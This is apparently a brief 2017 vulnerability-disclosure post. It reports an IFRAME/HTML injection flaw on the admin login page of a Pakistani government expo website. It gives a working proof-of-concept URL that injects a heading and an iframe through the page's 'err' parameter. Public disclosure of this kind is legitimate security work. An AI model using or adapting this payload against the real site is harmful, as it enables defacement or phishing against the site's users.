expopakistan.gov.pk – IFRAME Injection

New ” Tech Support scam ” uses rogue Google Chrome extension
February 27, 2017
Govts can now unlock iPhone 6 and 6+, also extract data from popular apps
March 1, 2017

Website : expopakistan.gov.pk

Vulnerability : IFRAME Injection

Latest check for patch:   20.02.2017

Vulnerability status:   Publicly disclosed

Alexa Rank   4921988

expopakistan.gov.pk

Description

Expo Pakistan 2015 Home.

Vulnerable URL:

http://www.expopakistan.gov.pk/mission-admin/login.php?err=<h1>XANY</h 1><iframe src=”https://www.openbugbounty.org” height=800 width=800 frameborder=1 align=center>

 

 

Leave a Reply